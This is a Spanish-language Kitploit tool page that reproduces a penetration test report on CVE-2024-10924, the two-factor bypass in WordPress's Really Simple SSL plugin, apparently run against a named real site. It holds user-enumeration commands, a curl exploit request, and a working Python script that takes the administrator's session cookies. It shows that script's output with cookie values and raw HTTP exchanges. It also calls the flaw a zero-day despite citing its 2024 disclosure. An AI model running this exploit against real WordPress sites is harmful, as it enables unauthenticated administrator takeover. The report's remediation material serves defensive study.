Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wordpress-cve-2024-10924-pentest — Informe detallado de pruebas de penetración y exploit de prueba de concepto para CVE-2024-10924, una vulnerabilidad crítica de omisión de 2FA en el plugin Really Simple SSL de WordPress, que permite el acceso de administrador no autenticado. | Kitploit
Herramientas/GitHubGitHub/ademto/wordpress-cve-2024-10924-pentest
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónAutenticaciónAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
ademto/wordpress-cve-2024-10924-pentest

wordpress-cve-2024-10924-pentest

Informe detallado de pruebas de penetración y exploit de prueba de concepto para CVE-2024-10924, una vulnerabilidad crítica de omisión de 2FA en el plugin Really Simple SSL de WordPress, que permite el acceso de administrador no autenticado.

Ver Repositorio
3hace 1 añoAún no revisado
Compartir

WordPress CVE-2024-10924 Informe de Pruebas de Penetración

Vulnerabilidad de Bypass de 2FA en el Plugin Really Simple SSL


📋 Tabla de Contenidos

  • Resumen Ejecutivo
  • Información del Objetivo
  • Metodología
  • Cronología
  • Fase de Reconocimiento
  • Análisis de Vulnerabilidades
  • Flujo de Ataque
  • Explotación
  • Evaluación de Impacto
  • Remediación
  • Herramientas Utilizadas
  • Referencias
  • Apéndices

🎯 Resumen Ejecutivo

Objetivo: https://skior.co
Vulnerabilidad: CVE-2024-10924 - Bypass de 2FA en el Plugin Really Simple SSL
Severidad: Crítica (Puntuación CVSS: 9.8)
Estado: Explotada con éxito
Fecha de Descubrimiento: 2025-06-25
Versión del Informe: 2.1

Esta prueba de penetración descubrió una vulnerabilidad crítica de bypass de autenticación que permite a atacantes no autenticados obtener acceso administrativo al sitio WordPress evitando los controles de autenticación de dos factores (2FA).

Hallazgos Clave

  • ✅ WordPress 6.8.1 con el plugin Really Simple SSL instalado
  • ✅ Vulnerabilidad de bypass de 2FA explotada con éxito
  • ✅ Acceso administrativo obtenido para el usuario "pastor"
  • ✅ Cookies de sesión válidas capturadas
  • ✅ Control completo sobre el panel de administración de WordPress
  • ✅ Vulnerabilidad de día cero (sin exploit público disponible en el momento del descubrimiento)

Matriz de Evaluación de Riesgos


🎯 Información del Objetivo

Información de Red

  • Certificado SSL: Válido (Let's Encrypt)
  • HTTP/2: Compatible
  • Cabeceras de Seguridad: Implementación básica
  • CDN: No detectado
  • WAF: No detectado

🔍 Metodología

Esta evaluación siguió una metodología sistemática de pruebas de penetración en caja negra basada en estándares de la industria:

  1. Reconocimiento - Identificación de tecnologías y enumeración pasiva
  2. Descubrimiento de Vulnerabilidades - Escaneo activo y pruebas manuales
  3. Explotación - Desarrollo y ejecución de prueba de concepto
  4. Evaluación de Impacto - Evaluación del daño potencial
  5. Documentación - Informe exhaustivo y guía de remediación

Enfoque de Pruebas

  • Pruebas en caja negra - Sin conocimiento previo del objetivo
  • No intrusivo - Impacto mínimo en los sistemas objetivo
  • Ético - Prácticas de divulgación responsable
  • Exhaustivo - Múltiples vectores de ataque explorados

⏰ Cronología


🔎 Fase de Reconocimiento

Paso 1: Identificación de la Pila de Tecnología

A. Análisis de Wappalyzer

Resultados de Wappalyzer

Tecnologías Identificadas:

  • WordPress 6.8.1 (Última versión)
  • Elementor 3.29.2 (Constructor de páginas)
  • Tema Astra 4.11.3
  • PHP 8.2.28
  • nginx 1.26.0 (Ubuntu)
  • jQuery 3.7.1

B. Escaneo Profundo de WhatWeb```bash

└─$ whatweb https://skior.co https://skior.co [200 OK] Country[UNITED STATES][US], HTML5,
HTTPServer[Ubuntu Linux][nginx/1.26.0 (Ubuntu)], IP[123.456.789.200],
JQuery[3.7.1],MetaGenerator[Elementor 3.29.2;
features: additional_custom_breakpoints, e_local_google_fonts;
settings: css_print_method-external, google_font-enabled, font_display-swap,
WordPress 6.8.1], PHP[8.2.28], PoweredBy[Skior],
Script[speculationrules,text/javascript], Title[Skior Technologies],
UncommonHeaders[link], WordPress[6.8.1], X-Powered-By[PHP/8.2.28], nginx[1.26.0]

root@kitploit:~
**Key Findings:**
- Instalación moderna de WordPress con la última versión
- Configuración de hosting profesional con nginx
- Marca personalizada ("PoweredBy[Skior]")
- Constructor de páginas Elementor en uso
- Ubicación geográfica: Estados Unidos

### Paso 2: Enumeración de usuarios

#### A. Enumeración de autores de WordPress```bash
└─$ curl -I https://skior.co/?author=1
HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.0 (Ubuntu)
Date: Wed, 25 Jun 2025 18:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.2.28
X-Redirect-By: WordPress
Location: https://skior.co/author/pastor/

Usuario descubierto: pastor (ID de usuario: 1)

B. Técnicas Adicionales de Enumeración de Usuarios```bash

Check for multiple users

for i in {1..10}; do echo "Checking user ID: $i" curl -s -o /dev/null -w "%{http_code}" "https://skior.co/?author=$i" echo " - https://skior.co/?author=$i" done

root@kitploit:~
#### C. Resultados de Enumeración de Usuarios

| ID de Usuario | Nombre de Usuario | Estado | URL de Redirección |
|---------|----------|--------|--------------|
| 1 | pastor | ✅ Encontrado | `/author/pastor/` |
| 2-10 | N/A | ❌ No Encontrado | respuestas 404 |

### Paso 3: Escaneo de Vulnerabilidades

#### A. Análisis Completo de WPScan```bash
└─$ wpscan --url https://skior.co --api-token my-api-key

Resumen de Resultados del Escaneo:

  • ✅ WordPress 6.8.1 (Última, lanzada 2025-04-30)
  • ✅ Tema: Astra 4.11.3 (Actualizado)
  • ✅ Plugins identificados:
    • Elementor 3.29.2
    • Astra Sites 4.4.26
    • Header Footer Elementor 2.4.2
    • WPForms Lite 1.9.6.1
  • ⚠️ XML-RPC habilitado (posible vector de ataque)
  • ⚠️ WP-Cron externo habilitado
  • ❌ No se encontraron vulnerabilidades conocidas en los componentes escaneados

Nota: WPScan no detectó el plugin Really Simple SSL, lo que indica que puede estar usando ofuscación o nombres personalizados.

B. Enumeración de la API REST```bash

└─$ curl -s https://skior.co/wp-json/ | jq '.routes | keys[]'

root@kitploit:~
**Endpoints personalizados descubiertos:**```
/reallysimplessl/v1/two_fa
/reallysimplessl/v1/two_fa/skip_onboarding
/reallysimplessl/v1/two_fa/do_not_ask_again
/reallysimplessl/v1/two_fa/resend_email_code
/reallysimplessl/v1/two_fa/save_default_method_email
/reallysimplessl/v1/two_fa/save_default_method_email_profile
/reallysimplessl/v1/two_fa/save_default_method_totp
/reallysimplessl/v1/two_fa/validate_email_setup

Descubrimiento crítico: El endpoint /reallysimplessl/v1/two_fa/skip_onboarding parecía sospechoso y merecía una investigación más profunda.


🔬 Análisis de Vulnerabilidad

Investigación de CVE-2024-10924

Después de descubrir las rutas personalizadas de la API REST, la investigación externa reveló CVE-2024-10924, una vulnerabilidad crítica que afecta al plugin Really Simple SSL.

Detalles de la Vulnerabilidad

CVE ID: CVE-2024-10924
Puntuación CVSS: 9.8 (Crítica)
Plugin Afectado: Really Simple SSL
Tipo de Vulnerabilidad: Omisión de Autenticación
Vector de Ataque: API REST
Fecha de Descubrimiento: 6 de noviembre de 2024
Divulgación Pública: 14 de noviembre de 2024

Causa Raíz Técnica

La vulnerabilidad se origina por una validación incorrecta de usuario en la función check_login_and_get_user dentro de las acciones de la API REST de autenticación de dos factores. La función no logra validar adecuadamente el parámetro login_nonce, lo que permite a los atacantes:

  1. Eludir Autenticación: Saltarse el proceso de inicio de sesión normal
  2. Eludir 2FA: Sortear los controles de autenticación de dos factores
  3. Escalada de Privilegios: Obtener acceso como cualquier usuario existente, incluidos los administradores

Análisis del Código Vulnerable```php

// Simplified vulnerable code structure function check_login_and_get_user($user_id, $login_nonce) { // Missing proper validation of login_nonce $user = get_user_by('ID', $user_id);

root@kitploit:~
// No validation of login_nonce parameter
// This allows any value to be accepted

return $user; // Returns user object without verification

}

root@kitploit:~
#### Endpoints Afectados

Los siguientes endpoints de la API REST son vulnerables:
- `/reallysimplessl/v1/two_fa/skip_onboarding`
- `/reallysimplessl/v1/two_fa/do_not_ask_again`
- `/reallysimplessl/v1/two_fa/resend_email_code`

#### Condiciones de Vulnerabilidad

Para que esta vulnerabilidad sea explotable:
- ✅ El plugin Really Simple SSL debe estar instalado y activado
- ✅ La configuración de autenticación de dos factores debe estar habilitada (deshabilitada por defecto)
- ✅ Al menos una cuenta de usuario debe existir en el sistema
- ✅ La API REST debe ser accesible (configuración predeterminada de WordPress)

---

## 🔄 Flujo de Ataque```mermaid
graph TD
    A[Initial Reconnaissance] --> B[Technology Stack Identification]
    B --> C[User Enumeration]
    C --> D[Vulnerability Scanning]
    D --> E[REST API Enumeration]
    E --> F[Discovery of Really Simple SSL Endpoints]
    F --> G[External Research]
    G --> H[Identification of CVE-2024-10924]
    H --> I[Manual Testing]
    I --> J[Exploit Development]
    J --> K[Successful Exploitation]
    K --> L[Admin Access Obtained]
    L --> M[Impact Assessment]
    
    style A fill:#e1f5fe
    style F fill:#fff3e0
    style H fill:#ffebee
    style K fill:#e8f5e8
    style L fill:#f3e5f5

Resumen del Vector de Ataque

  1. Recopilación de Información → Identificación de la pila tecnológica
  2. Enumeración de Usuarios → Usuario administrador descubierto: "pastor"
  3. Descubrimiento de API → Se encontraron endpoints REST vulnerables
  4. Investigación de Vulnerabilidades → Se identificó CVE-2024-10924
  5. Explotación → Se omitió 2FA y se obtuvo acceso de administrador

⚡ Explotación

Desarrollo de Prueba de Concepto

A. Pruebas Manuales

Primero, probamos el endpoint manualmente para entender su comportamiento:```bash

Test the vulnerable endpoint

curl -X POST "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
-H "Content-Type: application/json"
-d '{ "user_id": 1, "login_nonce": "invalid_nonce", "redirect_to": "/wp-admin/" }'

root@kitploit:~
#### B. Script de exploit en Python```python
import requests
import urllib.parse
import sys

if len(sys.argv) != 2:
    print("Usage: python exploit.py <user_id>")
    sys.exit(1)

user_id = sys.argv[1]

url = "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
data = {
    "user_id": int(user_id),  # User ID from the argument
    "login_nonce": "invalid_nonce",  # Arbitrary value
    "redirect_to": "/wp-admin/"  # Target redirection
}

# Sending the POST request
response = requests.post(url, json=data)

# Checking the response
if response.status_code == 200:
    print("Request successful!\n")
    
    # Extracting cookies
    cookies = response.cookies.get_dict()
    count = 1

    for name, value in cookies.items():
        decoded_value = urllib.parse.unquote(value)  # Decode the URL-encoded cookie value
        print(f"Cookie {count}:")
        print(f"Cookie Name: {name}")
        print(f"Cookie Value: {decoded_value}\n")
        count += 1
else:
    print("Request failed!")
    print(f"Status Code: {response.status_code}")
    print(f"Response Text: {response.text}")

Resultados de Explotación

Ejecución Exitosa```bash

└─$ python exploit.py 1 Request successful!

Cookie 1: Cookie Name: wordpress_sec_dc22060175d35fce22f69728c6799c9d Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da

Cookie 2: Cookie Name: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144

root@kitploit:~
#### Proceso de Manipulación de Cookies
![Cookie Manipulation](https://assets.kitploit.com/production/public/readmes/22186/4cbfbcc90655666664a94a59188e5860adacf05380043463e4ed4b96e43431e1.png)

*Arriba: Captura de pantalla que muestra el proceso de manipulación de cookies utilizando las herramientas de desarrollo del navegador para agregar las cookies de sesión de WordPress capturadas.*

#### Acceso de Administrador Exitoso
![Admin Dashboard Access](https://assets.kitploit.com/production/public/readmes/22186/6347bffa34742b8516c14617243c7acddf7175756d4e4fb3b9476737f848e7f8.png)

*Arriba: Captura de pantalla que confirma el acceso administrativo exitoso al panel de WordPress después de explotar la vulnerabilidad de omisión de 2FA.*

#### Análisis de Cookies

**Cookie de Seguridad de WordPress:**
- **Nombre:** `wordpress_sec_dc22060175d35fce22f69728c6799c9d`
- **Valor:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da`
- **Componentes:**
  - Nombre de usuario: `pastor`
  - Expiración: `1752234264` (marca de tiempo Unix)
  - Nonce: `GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH`
  - Hash: `cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da`

**Cookie de Inicio de Sesión de WordPress:**
- **Nombre:** `wordpress_logged_in_dc22060175d35fce22f69728c6799c9d`
- **Valor:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144`

---

## 🎯 Evaluación de Impacto

### Impacto Inmediato

1. **Compromiso Completo del Sitio**
   - Acceso administrativo al panel de WordPress
   - Capacidad de modificar contenido, temas y plugins del sitio
   - Acceso a gestión de usuarios y configuraciones

2. **Exposición de Datos**
   - Acceso a todas las cuentas y perfiles de usuario
   - Visibilidad del contenido de la base de datos
   - Acceso a archivos de configuración

3. **Escalada de Privilegios**
   - Omisión de todos los controles de autenticación
   - Elusión de las medidas de seguridad de 2FA
   - Capacidad de suplantar a cualquier usuario

### Escenarios de Ataque Potenciales

1. **Manipulación de Contenido**
   - Desfigurar contenido del sitio web
   - Inyectar código malicioso
   - Crear puertas traseras

2. **Robo de Datos**
   - Extraer información de usuarios
   - Acceder a contenido sensible
   - Descargar copias de seguridad de la base de datos

3. **Persistencia**
   - Instalar plugins maliciosos
   - Crear cuentas de administrador ocultas
   - Establecer comando y control

### Puntuación de Riesgo: **Crítico (9.8/10)**

| Factor | Puntuación | Justificación |
|--------|-------|---------------|
| **Complejidad de Acceso** | Baja (1.0) | Solicitud HTTP simple |
| **Autenticación** | Ninguna (0.0) | No se requiere autenticación |
| **Impacto en la Integridad** | Alto (1.0) | Compromiso completo del sistema |
| **Impacto en la Confidencialidad** | Alto (1.0) | Acceso completo a los datos |
| **Impacto en la Disponibilidad** | Alto (1.0) | Puede deshabilitar el sitio |

### Análisis de Impacto en el Negocio

| Categoría de Impacto | Gravedad | Descripción |
|----------------|----------|-------------|
| **Financiero** | Alto | Posible pérdida de ingresos, costos legales |
| **Reputacional** | Crítico | Daño a la marca, pérdida de confianza del cliente |
| **Operacional** | Alto | Interrupción del servicio, pérdida de datos |
| **Cumplimiento Normativo** | Alto | Violaciones regulatorias, fallos en auditorías |

---

## 🛡️ Remediación

### Acciones Inmediatas (0-24 horas)

1. **Deshabilitar el Plugin Really Simple SSL**   ```bash
   # Via wp-cli (if available)
   wp plugin deactivate really-simple-ssl
   
   # Or manually rename plugin directory
   mv wp-content/plugins/really-simple-ssl wp-content/plugins/really-simple-ssl.disabled
  1. Actualizar o eliminar el plugin

    • Verificar la versión actualizada de Really Simple SSL
    • Considerar soluciones alternativas de gestión SSL
    • Si no hay actualización disponible, eliminar el plugin por completo
  2. Auditar las sesiones de usuario

    • Revisar todas las sesiones de usuario activas
    • Forzar el cierre de sesión de todos los usuarios
    • Restablecer las contraseñas de administrador

Acciones a corto plazo (1-7 días)

  1. Endurecimiento de seguridad

    • Implementar un cortafuegos de aplicaciones web (WAF)
    • Habilitar la limitación de tasa en los endpoints de la API REST
    • Agregar restricciones de acceso basadas en IP
  2. Implementación de monitoreo

    • Habilitar el registro de seguridad de WordPress
    • Monitorear actividades de administración sospechosas
    • Implementar monitoreo de integridad de archivos

Medidas de seguridad a largo plazo (1-4 semanas)

  1. Evaluaciones periódicas de seguridad

    • Escaneos de vulnerabilidades mensuales
    • Pruebas de penetración trimestrales
    • Monitoreo continuo de seguridad
  2. Actualizaciones de políticas de seguridad

    • Revisar y actualizar las políticas de seguridad
    • Implementar procedimientos de gestión de cambios
    • Establecer protocolos de respuesta a incidentes

Recomendaciones de configuración```php

// Add to wp-config.php for enhanced security define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); define('FORCE_SSL_ADMIN', true);

// Restrict REST API access add_filter('rest_authentication_errors', function($result) { if (!empty($result)) { return $result; } if (!is_user_logged_in()) { return new WP_Error('rest_not_logged_in', 'You are not currently logged in.', array('status' => 401)); } return $result; });

// Additional security headers add_action('send_headers', function() { header('X-Content-Type-Options: nosniff'); header('X-Frame-Options: SAMEORIGIN'); header('X-XSS-Protection: 1; mode=block'); header('Referrer-Policy: strict-origin-when-cross-origin'); });

root@kitploit:~
### Soluciones SSL Alternativas

| Solución | Ventajas | Desventajas | Recomendación |
|----------|------|------|----------------|
| **Let's Encrypt** | Gratuito, automatizado | Configuración manual | ✅ Recomendado |
| **Cloudflare** | Configuración fácil, protección DDoS | Requiere cambio de DNS | ✅ Buena opción |
| **SSL del Proveedor de Hospedaje** | Integrado | Puede tener limitaciones | ⚠️ Verificar características |
| **SSL Manual** | Control total | Configuración compleja | ❌ No recomendado |

---

## 🛠️ Herramientas Utilizadas

### Herramientas de Reconocimiento
- **Wappalyzer** - Identificación de pila tecnológica
- **WhatWeb** - Huella digital de aplicaciones web
- **WPScan** - Escaneo de vulnerabilidades de WordPress
- **curl** - Pruebas manuales de API

### Herramientas de Explotación
- **Python 3** - Desarrollo de exploits
- **requests** - Librería cliente HTTP
- **urllib.parse** - Codificación/decodificación de URL

### Herramientas de Análisis
- **jq** - Procesamiento JSON
- **grep** - Coincidencia de patrones de texto
- **bash** - Automatización de línea de comandos

---

## 📚 Referencias

### Información de Vulnerabilidades
- [CVE-2024-10924](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10924)
- [Seguridad de Plugins de WordPress](https://wordpress.org/plugins/security/)
- [Plugin Really Simple SSL](https://wordpress.org/plugins/really-simple-ssl/)

### Documentación Técnica
- [WordPress REST API Handbook](https://developer.wordpress.org/rest-api/)
- [Mejores Prácticas de Seguridad de WordPress](https://wordpress.org/support/article/hardening-wordpress/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)

### Herramientas y Recursos
- [WPScan](https://wpscan.com/)
- [WhatWeb](https://github.com/urbanadventurer/WhatWeb)
- [Wappalyzer](https://www.wappalyzer.com/)

### CVEs Relacionados
- CVE-2024-10924 - Omisión de 2FA en Really Simple SSL
- CVE-2023-28121 - XSS en el núcleo de WordPress
- CVE-2023-28122 - CSRF en el núcleo de WordPress

### Estándares de la Industria
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)
- [ISO 27001](https://www.iso.org/isoiec-27001-information-security.html)

---

## 📄 Aviso Legal

Este informe de pruebas de penetración es solo para fines educativos y de evaluación de seguridad autorizada. Las técnicas y herramientas descritas solo deben utilizarse contra sistemas que posea o para los que tenga permiso explícito de prueba. Las pruebas no autorizadas pueden violar leyes y regulaciones.

**Divulgación Responsable:** Esta vulnerabilidad ha sido reportada a los desarrolladores del plugin y al equipo de seguridad de WordPress.

**Descargo de Responsabilidad:** La información proporcionada en este informe se basa en la evaluación realizada en el momento de la prueba. Los panoramas de seguridad cambian rápidamente y pueden existir vulnerabilidades adicionales que no fueron descubiertas durante esta evaluación.

---

## 📋 Apéndices

### Apéndice A: Solicitudes HTTP Crudas

#### Solicitud de Explotación Exitosa```http
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: skior.co
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

{
  "user_id": 1,
  "login_nonce": "invalid_nonce",
  "redirect_to": "/wp-admin/"
}

Encabezados de respuesta```http

HTTP/1.1 200 OK Server: nginx/1.26.0 (Ubuntu) Date: Wed, 25 Jun 2025 18:15:30 GMT Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_sec_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da; path=/; secure; HttpOnly Set-Cookie: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144; path=/

root@kitploit:~
### Apéndice B: Lista de verificación de seguridad

#### Pre-Explotación
- [ ] Identificación del objetivo y definición del alcance
- [ ] Autorización legal obtenida
- [ ] Entorno de pruebas preparado
- [ ] Herramientas y scripts validados

#### Durante la explotación
- [ ] Vulnerabilidad confirmada manualmente
- [ ] Exploit desarrollado y probado
- [ ] Impacto limitado al alcance autorizado
- [ ] Evidencia documentada minuciosamente

#### Post-Explotación
- [ ] Todo acceso eliminado
- [ ] Evidencia preservada
- [ ] Informe generado
- [ ] Recomendaciones de remediación proporcionadas

### Apéndice C: Glosario

| Término | Definición |
|---------|------------|
| **2FA** | Autenticación de dos factores |
| **CVSS** | Sistema Común de Puntuación de Vulnerabilidades |
| **REST API** | Interfaz de Programación de Aplicaciones de Transferencia de Estado Representacional |
| **WAF** | Cortafuegos de Aplicaciones Web |
| **XSS** | Secuencias de comandos entre sitios |
| **CSRF** | Falsificación de petición en sitios cruzados |

---

*Informe generado el: 2025-06-25*  
*Investigador de Seguridad*  
*Versión: 2.1*  
*Última actualización: 2025-06-25*
Descargar herramienta
Nivel de RiesgoProbabilidadImpactoPrioridad de Mitigación
CríticoAltaCompromiso Completo del SistemaInmediata
AltoMediaFuga de DatosAlta
MedioBajaInterrupción del ServicioMedia
CampoValor
Dominiohttps://skior.co
Dirección IP123.456.789.200
Servidornginx/1.26.0 (Ubuntu)
Versión de PHP8.2.28
CMSWordPress 6.8.1
Plugin VulnerableReally Simple SSL
Ubicación GeográficaEstados Unidos
Proveedor de AlojamientoAlojamiento profesional (probablemente VPS/Dedicado)
Fecha/HoraEventoDetalles
2025-06-25 14:02Reconocimiento InicialAnálisis de Wappalyzer completado
2025-06-25 14:05Pila de Tecnología IdentificadaWordPress 6.8.1, nginx, PHP 8.2.28
2025-06-25 14:10Enumeración de UsuariosUsuario "pastor" descubierto (ID: 1)
2025-06-25 14:15Análisis WPScanNo se encontraron vulnerabilidades conocidas
2025-06-25 14:20Enumeración de API RESTEndpoints de Really Simple SSL descubiertos
2025-06-25 14:25Investigación de VulnerabilidadesCVE-2024-10924 identificada
2025-06-25 14:30Pruebas ManualesConfirmada la existencia de la vulnerabilidad
2025-06-25 14:35Desarrollo de ExploitPrueba de concepto en Python creada
2025-06-25 14:40Explotación ExitosaAcceso de administrador obtenido
2025-06-25 14:45Evaluación de ImpactoDocumentado el daño potencial
2025-06-25 15:00Generación del InformeDocumentación exhaustiva